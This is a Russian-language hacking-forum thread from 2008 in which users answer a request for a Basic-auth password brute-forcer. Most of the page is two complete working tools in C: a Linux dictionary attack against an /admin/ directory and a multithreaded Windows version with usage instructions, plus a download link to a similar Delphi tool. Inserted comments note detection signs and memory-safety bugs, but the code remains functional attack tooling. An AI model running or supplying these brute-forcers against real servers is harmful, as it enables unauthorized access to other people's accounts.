
Просмотр полной версии : брут для basic auth


Sharky
21.02.2008, 01:09
помогите написать брут для basic-auth на си си++ или дельфях

z01b
21.02.2008, 01:24
Я сомневаюсь, что кто-то здесь будет писать за тебя. Начинай и, если будут вопросы, задавай — юзеры постараются ответить.

iddqd
21.02.2008, 02:00
зачем изобретать велосипед?
brutus aet2

zl0y
21.02.2008, 03:53
зачем изобретать велосипед?
brutus aet2
про велосипед вообще никто не спрашивал, не одобряю.

Sharky
21.02.2008, 21:31
зачем изобретать велосипед?
brutus aet2
если бы мне нужен был брутус, я бы не спрашивал... мне нужен свой консольный брут... искал в инете инфу, что-то ничего путного не нашёл

bul.666
21.02.2008, 21:57
юзай сокеты... Прими ответ от басика и там уже думай

Jes
21.02.2008, 22:49
Upon receipt of an unauthorized request for a URI within the protection space, the server should respond with a challenge like the following:
WWW-Authenticate: Basic realm="WallyWorld"
where "WallyWorld" is the string assigned by the server to identify the protection space of the Request-URI.

To receive authorization, the client sends the user-ID and password, separated by a single colon (":") character, within a base64 [5] encoded string in the credentials.
basic-credentials = "Basic" SP basic-cookie
basic-cookie = <base64 [5] encoding of userid-password,
except not limited to 76 char/line>
userid-password = [ token ] ":" *TEXT

If the user agent wishes to send the user-ID "Aladdin" and password "open sesame", it would use the following header field:
Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==


то есть:

"GET /private/index.html HTTP/1.0
Host: localhost
Authorization: Basic " + Convert.ToBase64String(new ASCIIEncoding().GetBytes(username + ":" + Password))

а именно, в заголовок запроса добавляется строка:
Authorization: Basic ... + строка вида «логин:пароль» (логин и пароль через двоеточие), закодированная в Base64

Ch3ck
22.02.2008, 00:52
_http://badnewsforyou.narod.ru/webhacker.rar
Залил исходник(Делфе :cool: ) программы наподобие брутус ает

nerezus
22.02.2008, 07:56
за $30 напишу

Digimortal
24.02.2008, 02:59
пример под линух by И.Скляров..
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>

#define USER "users.txt"
#define PASS "words.txt"
#define CATALOG "/admin/"

static char table64[]=
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwx yz0123456789+/";

char *port_host;
char *name;

/*
 * Split a "host[:port]" argument in place.
 *
 * The text before the first ':' is stored in the global `name`; whatever
 * follows it is stored in the global `port_host`. When nothing follows,
 * `port_host` falls back to the string "80". `arg` is modified by strtok().
 */
void token(char *arg)
{
    char *host_part = strtok(arg, ":");
    char *remainder = strtok(NULL, "");

    name = host_part;
    port_host = (remainder != NULL) ? remainder : "80";
}

/*
 * Encode the NUL-terminated string `intext` into `output` using table64.
 *
 * Input is consumed three bytes at a time; each group yields four output
 * characters, with '=' padding when the last group has one or two bytes.
 * `output` is NUL-terminated on return. No output length is passed in, so
 * the caller must supply a buffer large enough for the result.
 */
void base64Encode(char *intext, char *output)
{
    while (*intext != '\0') {
        unsigned char in[3] = {0, 0, 0};
        int taken = 0;

        /* Gather up to three input bytes; missing ones stay zero. */
        while (taken < 3 && *intext != '\0') {
            in[taken] = (unsigned char)*intext;
            taken++;
            intext++;
        }

        /* First two characters are always emitted. */
        output[0] = table64[(in[0] & 0xFC) >> 2];
        output[1] = table64[((in[0] & 0x03) << 4) | ((in[1] & 0xF0) >> 4)];

        /* Third and fourth depend on how many bytes were actually read. */
        if (taken >= 2)
            output[2] = table64[((in[1] & 0x0F) << 2) | ((in[2] & 0xC0) >> 6)];
        else
            output[2] = '=';

        if (taken >= 3)
            output[3] = table64[in[2] & 0x3F];
        else
            output[3] = '=';

        output += 4;
    }
    *output = 0;
}

/*
 * Entry point. For every line of USER combined with every line of PASS it
 * opens a new TCP connection, sends a GET for CATALOG carrying an
 * "Authorization: Basic" header built from "user:password", and prints the
 * pair when the first chunk of the response contains "200 OK".
 *
 * argv[1] is host[:port]. With the optional argv[2] (proxy[:port]) the
 * connection goes to the proxy and the request line carries an absolute URI.
 *
 * Defender's view: each attempt is a separate connection and a separate
 * request to the same path, differing only in the Authorization header, so a
 * run shows up as a burst of failed authentications (typically 401) from one
 * source. Counting failures per account and per source, throttling or
 * locking out after repeated failures, and alerting on such bursts address it.
 *
 * NOTE(review): the listing is not memory-safe. sprintf() writes into the
 * fixed buffers str1[270] and str2[100] without a bound, the recv() result is
 * used as an index without checking for -1, and fd2 is reopened per user and
 * never closed. exit(), close() and bzero() are also used without their
 * headers (<stdlib.h>, <unistd.h>, <strings.h>) among the visible includes.
 */
int main(int argc, char **argv)
{
FILE *fd1, *fd2;
int sd, bytes;
char buf1[250], buf2[250];
char buf[250];
char str1[270], str2[100];
struct hostent* host;
struct sockaddr_in servaddr;
char rez[2000];
char c[600];

if (argc < 2 || argc > 3) {
fprintf(stderr, "Usage: %s host[:port] [proxy][:port]\n\n", argv[0]);
exit(-1);
}

/* The connection target is the proxy when one is given, else the host. */
if (argc == 3)
token(argv[2]);
else
token(argv[1]);

if ( (host = gethostbyname(name)) == NULL) {
herror("gethostbyname() failed");
exit(-1);
}

bzero(&servaddr, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(atoi(port_host));
servaddr.sin_addr = *((struct in_addr *)host->h_addr);

if ( (fd1 = fopen(USER, "r")) == NULL) {
perror("fopen() failed");
exit(-1);
}

/* Outer loop: one pass per non-empty line of USER. */
while(fgets(buf1, 250, fd1) != NULL)
{
/* Cut the line at the first CR, LF or TAB. */
buf1[strcspn(buf1, "\r\n\t")] = 0;
if (strlen(buf1) == 0) continue;

/* PASS is reopened for every user name; it is not closed afterwards. */
if( (fd2 = fopen(PASS, "r")) == NULL) {
perror("fopen() failed");
exit(-1);
}

/* Inner loop: one request per non-empty line of PASS. */
while(fgets(buf2, 250, fd2) != NULL)
{
buf2[strcspn(buf2, "\r\n\t")] = 0;
if (strlen(buf2) == 0) continue;

/* Basic credentials are "user:password", then encoded via base64Encode(). */
sprintf(c, "%s:%s", buf1, buf2);
base64Encode(c, rez);

/* A fresh socket and connection are used for each attempt. */
if ( (sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
perror("socket() failed");
exit(-1);
}

if (connect(sd, (struct sockaddr *)&servaddr, sizeof(servaddr)) == -1) {
perror("connect() failed");
exit(-1);
}

/* Origin-form request line when direct, absolute URI when via proxy. */
if (argc == 2)
sprintf(str1, "GET %s HTTP/1.1\r\n", CATALOG);
else
sprintf(str1, "GET http://%s%s HTTP/1.1\r\n", argv[1], CATALOG);

/* NOTE(review): str2 is 100 bytes; host plus the encoded credentials can exceed it. */
sprintf(str2, "Host:%s\r\nAuthorization: Basic %s\r\n\r\n", argv[1], rez);

/* Return values of send() are not checked. */
send(sd, str1, strlen(str1), 0);
send(sd, str2, strlen(str2), 0);

bzero(buf, 250);

/* Only a single recv() of at most 249 bytes is examined. */
/* NOTE(review): when recv() returns -1 the next line writes to buf[-1]. */
bytes = recv(sd, buf, sizeof(buf)-1, 0);
buf[bytes] = 0;

/* Success is judged solely by the substring "200 OK" in that first chunk. */
if (strstr(buf, "200 OK") != NULL) {
printf("======================================\n");
printf("%s", str1);

printf("%s\n", str2);
printf("Result OK: %s\n", c);
printf("======================================\n");
}

close(sd);
}
}

return 0;
}

nc.STRIEM
24.02.2008, 15:35
Тоже написал

#include <winsock2.h>
#include <stdio.h>
#include <conio.h>

#pragma comment(lib,"ws2_32")

// Request template: path, host and the Base64 credentials are filled in via sprintf().
#define PACK "GET %s HTTP/1.0\r\nHost: %s\r\nAuthorization: Basic %s\r\n\r\n"
// Number of slots in the `pass` array shared by the reader and worker threads.
#define KR 128

////////////////////////////////////////////////////////////////////////
// All state below is shared between threads as plain globals; no lock or
// atomic type is used anywhere in the visible code.
FILE *fr;                   // credentials file opened in main(), read by READ()
char pack[128];             // PACK with path and host filled in; one "%s" left for check()
int CurThr;                 // worker threads currently running
sockaddr_in ClientService;  // target address filled in by main()
int CLsize;                 // sizeof(ClientService), passed to connect()
char host[128];             // copied from argv[1]
char path[128];             // copied from argv[2]
int THR;                    // maximum number of concurrent workers, from argv[3]
int PL;                     // pending-line counter used by main() as loop condition
int so;                     // while non-zero, info() keeps refreshing the status display
int p_good, p_bad, p_er;    // counters: "200 OK" seen / not seen / connect or send error
int fl;                     // ad-hoc busy flag around the result-file write in check()
char fwr[128];              // result file name, copied from argv[5]
// One slot of the shared ring of candidate lines.
struct pp{
char p[128];   // one line of the credentials file
int st;        // 1 = slot holds a line waiting to be tried, 0 = free
int tr;        // 1 = a worker thread currently owns this slot
};
pp *pass;      // array of KR slots allocated in main()


// Lookup table used by en64() to turn 6-bit values into characters.
// NOTE(review): as printed here the literal holds 65 characters, including a
// space between "wx" and "yz", so it is not the standard 64-character Base64
// alphabet. Possibly an artifact of how the forum rendered the post; confirm
// against the original listing.
static const unsigned char base64digits[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwx yz0123456789+/";

// Marker for byte values that are not Base64 characters.
#define BAD 255
// Reverse table for codes 0..127: character code -> 6-bit value, or BAD.
// Neither this table nor DECODE64 is referenced by the code shown on this page.
static const unsigned char base64val[] = {
BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD,
BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD,
BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD, 62, BAD,BAD,BAD, 63,
52, 53, 54, 55, 56, 57, 58, 59, 60, 61,BAD,BAD, BAD,BAD,BAD,BAD,
BAD, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25,BAD, BAD,BAD,BAD,BAD,
BAD, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51,BAD, BAD,BAD,BAD,BAD
};
// Maps a printable character (codes 33..126) through base64val; anything else is BAD.
#define DECODE64(c) ((c > 32 && c<127)? base64val[(int)c] : BAD)

// Encode `inlen` bytes from `in` into `out` using base64digits.
//
// Every group of up to three input bytes becomes four output characters;
// a short final group is padded with '='. `out` is NUL-terminated and the
// returned pointer addresses that terminator. No output size is passed in,
// so the caller must provide a large enough buffer.
char* en64 (const char *in, char *out, int inlen)
{
    while (inlen > 0)
    {
        const bool haveSecond = inlen > 1;
        const bool haveThird = inlen > 2;

        out[0] = base64digits[in[0] >> 2];
        out[1] = base64digits[((in[0]&3)<<4) | (haveSecond ? (in[1]>>4) : 0)];

        if (haveSecond)
            out[2] = base64digits[((in[1] << 2) & 0x3c) | (haveThird ? (in[2] >> 6) : 0)];
        else
            out[2] = '=';

        if (haveThird)
            out[3] = base64digits[in[2] & 0x3f];
        else
            out[3] = '=';

        out += 4;
        in += 3;
        inlen -= 3;
    }
    *out = '\0';
    return out;
}


// Worker thread: tries the credentials line stored in slot `i` of `pass`.
//
// The line is encoded with en64(), inserted into the prepared request in
// `pack`, and sent over a new TCP connection to ClientService. If the first
// bytes of the reply contain "200 OK", the line is appended to the result
// file named by `fwr`. The slot is then released and the counters updated.
//
// Defender's view: every attempt is its own connection and its own request
// to the same path, with only the Authorization header changing, and many
// run concurrently. Failure counting per account and per source, throttling
// or lockout, and alerting on bursts of failed authentications address it.
//
// NOTE(review): the shared counters (CurThr, PL, p_good, p_bad, p_er) are
// plain ints updated from several threads without synchronization.
DWORD WINAPI check(LPVOID i)
{
char header[256];
char b64t[200];
en64(pass[(int)i].p, b64t, strlen(pass[(int)i].p));
// NOTE(review): `pack` is used as the format string and was built from the
// host and path arguments; the write into header[256] is not bounded.
sprintf(header, pack, b64t);
SOCKET ksocket;
int len;
char buff[32];
FILE *fw;

// The result of socket() is not checked before connect().
ksocket=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(connect( ksocket, (SOCKADDR*) &ClientService, CLsize ) == SOCKET_ERROR)
{
// Error path: the slot keeps st as it was, so main() may dispatch it again.
// The socket is not closed here.
pass[(int)i].tr = 0;
CurThr--;
p_er++;
return false;
}
len = send(ksocket, header, strlen(header), 0);
if(len == SOCKET_ERROR)
{
// Same handling as a failed connect(); the socket is not closed here either.
pass[(int)i].tr = 0;
CurThr--;
p_er++;
return false;
}
// Only one recv() of at most 32 bytes is examined.
// NOTE(review): a return of 32 writes buff[32], one past the array, and
// SOCKET_ERROR is used as an index without being checked.
buff[recv(ksocket, buff, 32, 0)] = '\0';

// Success is judged solely by the substring "200 OK" in those bytes.
if(strstr(buff, "200 OK") != NULL)
{
// `fl` serves as a busy flag around the file write; it is a plain int
// checked once, so it does not actually serialize concurrent writers.
if(fl) Sleep(50);
fl=1;
// The result of fopen() is not checked before fprintf().
fw=fopen(fwr, "ab");
fprintf(fw,"%s\n", pass[(int)i].p);
fclose(fw);
fl=0;
p_good++;
}
else p_bad++;
closesocket(ksocket);

// Release the slot so READ() can refill it.
pass[(int)i].st=0;
pass[(int)i].tr = 0;
CurThr--;
PL--;
return true;
}


// Reader thread: feeds lines of the credentials file `fr` into the shared
// ring of KR slots in `pass`.
//
// All slots are first marked free. The loop then cycles over the ring until
// feof(fr) is set; whenever a slot is free (st == 0 and tr == 0) it reads one
// line into it, cuts it at the first CR, LF or TAB, marks it ready (st = 1)
// and increments PL. When no slot is free the loop keeps spinning.
// After the loop PL is decremented once, which offsets the initial PL = 1
// set in main(), and the file is closed.
DWORD WINAPI READ(LPVOID x)
{
int i;

for(i=0; i<KR; i++)
{
pass[i].st=0;
pass[i].tr=0;
}
i=0;
while(!feof(fr))
{
if(i >= KR) i=0;

if(pass[i].st == 0 && pass[i].tr == 0)
{
// NOTE(review): the fgets() result is not checked; when it fails at end
// of file the slot keeps its previous contents but is still marked ready.
fgets(pass[i].p, 128, fr);
pass[i].p[strcspn(pass[i].p, "\r\n\t")] = 0;
pass[i].st=1;
PL++;
}
i++;
}
PL--;
// main() also calls fclose(fr) after its dispatch loop.
fclose(fr);

return true;
}


// Status thread: while the global `so` is non-zero, clears the console and
// prints the target, the running/maximum thread counts and the three result
// counters, then sleeps 500 ms before the next refresh.
DWORD WINAPI info(LPVOID x)
{
    for (; so; Sleep(500))
    {
        system("cls");
        printf("Target: %s%s\n", host, path);
        printf("Thread: %d/%d\n", CurThr, THR);
        printf("Founr:  %d\n", p_good);
        printf("Bad:    %d\n", p_bad);
        printf("Error:  %d\n", p_er);
    }
    return true;
}


// Entry point. Arguments: host, path, thread limit, credentials file,
// result file. Resolves the host, prepares the request template, starts the
// READ() and info() threads, and then dispatches one check() thread per
// ready slot while keeping at most THR workers running. The port is fixed
// at 80.
//
// Defender's view: the thread limit controls how many authentication
// attempts hit the same path concurrently from one source; per-source and
// per-account failure limits and alerting on bursts of failed
// authentications address it.
//
// NOTE(review): argv values are copied with strcpy() into 128-byte globals
// and formatted into pack[128] without a length check, and `pass` is never
// freed.
int main(int argc, char *argv[])
{

// Five arguments are required in addition to the program name.
if(argc < 6)
{
printf("USE: host path tread filePass fileResult\n");
return 0;
}

strcpy(host, argv[1]);
strcpy(path, argv[2]);
THR=atoi(argv[3]);
strcpy(fwr, argv[5]);

fr=fopen(argv[4], "rb");
if(!fr)
{
printf("File not found\n");
return 0;
}

WSADATA wsaData;
if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR)
{
printf("Error at WSAStartup()\n");
return 0;
}

struct hostent *Ip = gethostbyname(host);
if(Ip == NULL)
{
printf("Error at gethostbyname()\n");
return 0;
}
ClientService.sin_family = AF_INET;
// The resolved address is converted to text and back before being stored.
ClientService.sin_addr.s_addr = inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));
ClientService.sin_port = htons(80);
CLsize=sizeof(ClientService);

DWORD thID;
pass = new pp[KR];
CurThr=0;
p_good=0;
p_bad=0;
p_er=0;
int i=0;
// PL starts at 1 so the dispatch loop below does not end before READ() has
// queued anything; READ() removes this extra count when it finishes.
PL=1;
so=1;
fl=0;
// Fill path and host into the template, leaving one "%s" for check().
sprintf(pack, PACK, path, host, "%s");
CreateThread(0, 0, READ, (LPVOID)0, 0, &thID);

CreateThread(0, 0, info, (LPVOID)0, 0, &thID);
Sleep(1000);
// Dispatch loop: runs until no lines are pending and no worker is active.
while(PL != 0 || CurThr != 0)
{
if(CurThr >= THR)
{
Sleep(100);
continue;
}
if(i >= KR) i=0;
// A slot is handed to a worker when it is ready and not already owned.
if(pass[i].st == 1 && pass[i].tr == 0)
{
pass[i].tr = 1;
CurThr++;
// Thread handles returned by CreateThread() are not kept or closed.
CreateThread(0, 0, check, (LPVOID)i, 0, &thID);
}
i++;
}

// NOTE(review): READ() has already closed fr, so this closes it a second time.
fclose(fr);
Sleep(1000);
so=0;
system("pause");
return 1;
}

USE: host path tread filePass fileResult
например
brut.exe localhost /1.php 50 pass.txt result.txt

файл с паролями в формате

логин:пароль
логин:пароль
логин:пароль